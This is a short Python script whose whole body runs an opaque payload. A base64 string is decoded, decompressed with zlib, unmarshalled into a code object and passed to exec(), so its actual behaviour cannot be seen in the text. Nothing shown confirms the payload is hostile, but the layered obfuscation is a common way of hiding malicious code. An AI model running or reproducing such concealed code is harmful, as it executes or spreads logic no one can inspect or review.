
import marshal, base64, zlib, sys
exec(marshal.loads(zlib.decompress(base64.b64decode('eJx7zIAEGKH0Zy4gMZ0hhaGFIYqhklGTKZkJSRULEDODVCmAVZXAdDHUMNQwVgHp1Yww4yoZNBn9NBlvsRYUZeaVaDLdYky8xZhUDDJNQeEXl01+WmlxcmJKvt0tTrCK+OLS3CJ2qEuKeYFEA8MdFs4OxQ7HTuVWr88gU4HmgZWsZCjiAFJFbEDiF4dNbn5KaU6qXREXTDeI8YGZkZHxMxMjIz9YLQB0SCpi'))), globals())
